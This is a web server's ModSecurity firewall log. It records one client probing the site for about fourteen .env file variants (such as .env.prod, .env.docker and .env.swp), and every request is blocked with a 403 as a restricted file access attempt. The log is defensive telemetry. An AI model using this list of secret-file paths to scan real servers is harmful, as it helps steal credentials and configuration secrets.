[Mon May 11 17:33:30.677236 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.save"] [unique_id "agH2yjJnyuKVXoStDhbMtAAAAEs"]
[Mon May 11 17:33:30.677463 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yjJnyuKVXoStDhbMtAAAAEs"]
[Mon May 11 17:33:30.791537 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.old"] [unique_id "agH2yjJnyuKVXoStDhbMtQAAAEs"]
[Mon May 11 17:33:30.791764 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.old"] [unique_id "agH2yjJnyuKVXoStDhbMtQAAAEs"]
[Mon May 11 17:33:30.791995 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yjJnyuKVXoStDhbMtQAAAEs"]
[Mon May 11 17:33:30.907471 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.sample"] [unique_id "agH2yjJnyuKVXoStDhbMtgAAAEs"]
[Mon May 11 17:33:30.907700 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.sample"] [unique_id "agH2yjJnyuKVXoStDhbMtgAAAEs"]
[Mon May 11 17:33:30.907932 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yjJnyuKVXoStDhbMtgAAAEs"]
[Mon May 11 17:33:31.025599 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.example"] [unique_id "agH2yzJnyuKVXoStDhbMtwAAAEs"]
[Mon May 11 17:33:31.025840 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.example"] [unique_id "agH2yzJnyuKVXoStDhbMtwAAAEs"]
[Mon May 11 17:33:31.026086 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yzJnyuKVXoStDhbMtwAAAEs"]
[Mon May 11 17:33:31.141648 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.dev"] [unique_id "agH2yzJnyuKVXoStDhbMuAAAAEs"]
[Mon May 11 17:33:31.141872 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.dev"] [unique_id "agH2yzJnyuKVXoStDhbMuAAAAEs"]
[Mon May 11 17:33:31.142106 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yzJnyuKVXoStDhbMuAAAAEs"]
[Mon May 11 17:33:31.603635 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.prod"] [unique_id "agH2yzJnyuKVXoStDhbMuQAAAEs"]
[Mon May 11 17:33:31.603819 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.prod"] [unique_id "agH2yzJnyuKVXoStDhbMuQAAAEs"]
[Mon May 11 17:33:31.604031 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yzJnyuKVXoStDhbMuQAAAEs"]
[Mon May 11 17:33:31.719709 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.stage"] [unique_id "agH2yzJnyuKVXoStDhbMugAAAEs"]
[Mon May 11 17:33:31.719927 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.stage"] [unique_id "agH2yzJnyuKVXoStDhbMugAAAEs"]
[Mon May 11 17:33:31.720148 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yzJnyuKVXoStDhbMugAAAEs"]
[Mon May 11 17:33:31.834120 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.ci"] [unique_id "agH2yzJnyuKVXoStDhbMvAAAAEs"]
[Mon May 11 17:33:31.834361 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.ci"] [unique_id "agH2yzJnyuKVXoStDhbMvAAAAEs"]
[Mon May 11 17:33:31.834589 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yzJnyuKVXoStDhbMvAAAAEs"]
[Mon May 11 17:33:31.948593 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.docker"] [unique_id "agH2yzJnyuKVXoStDhbMvQAAAEs"]
[Mon May 11 17:33:31.948814 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.docker"] [unique_id "agH2yzJnyuKVXoStDhbMvQAAAEs"]
[Mon May 11 17:33:31.949031 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yzJnyuKVXoStDhbMvQAAAEs"]
[Mon May 11 17:33:32.064143 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.live"] [unique_id "agH2zDJnyuKVXoStDhbMvgAAAEs"]
[Mon May 11 17:33:32.064381 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.live"] [unique_id "agH2zDJnyuKVXoStDhbMvgAAAEs"]
[Mon May 11 17:33:32.064589 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zDJnyuKVXoStDhbMvgAAAEs"]
[Mon May 11 17:33:32.179458 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.preprod"] [unique_id "agH2zDJnyuKVXoStDhbMvwAAAEs"]
[Mon May 11 17:33:32.179667 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.preprod"] [unique_id "agH2zDJnyuKVXoStDhbMvwAAAEs"]
[Mon May 11 17:33:32.179889 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zDJnyuKVXoStDhbMvwAAAEs"]
[Mon May 11 17:33:32.294562 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.uat"] [unique_id "agH2zDJnyuKVXoStDhbMwAAAAEs"]
[Mon May 11 17:33:32.294783 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.uat"] [unique_id "agH2zDJnyuKVXoStDhbMwAAAAEs"]
[Mon May 11 17:33:32.295018 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zDJnyuKVXoStDhbMwAAAAEs"]
[Mon May 11 17:33:32.414070 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.dist"] [unique_id "agH2zDJnyuKVXoStDhbMwQAAAEs"]
[Mon May 11 17:33:32.414305 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.dist"] [unique_id "agH2zDJnyuKVXoStDhbMwQAAAEs"]
[Mon May 11 17:33:32.414535 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zDJnyuKVXoStDhbMwQAAAEs"]
[Mon May 11 17:33:32.530194 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.swp"] [unique_id "agH2zDJnyuKVXoStDhbMwgAAAEs"]
[Mon May 11 17:33:32.530418 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.swp"] [unique_id "agH2zDJnyuKVXoStDhbMwgAAAEs"]
[Mon May 11 17:33:32.530651 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2zDJnyuKVXoStDhbMwgAAAEs"]
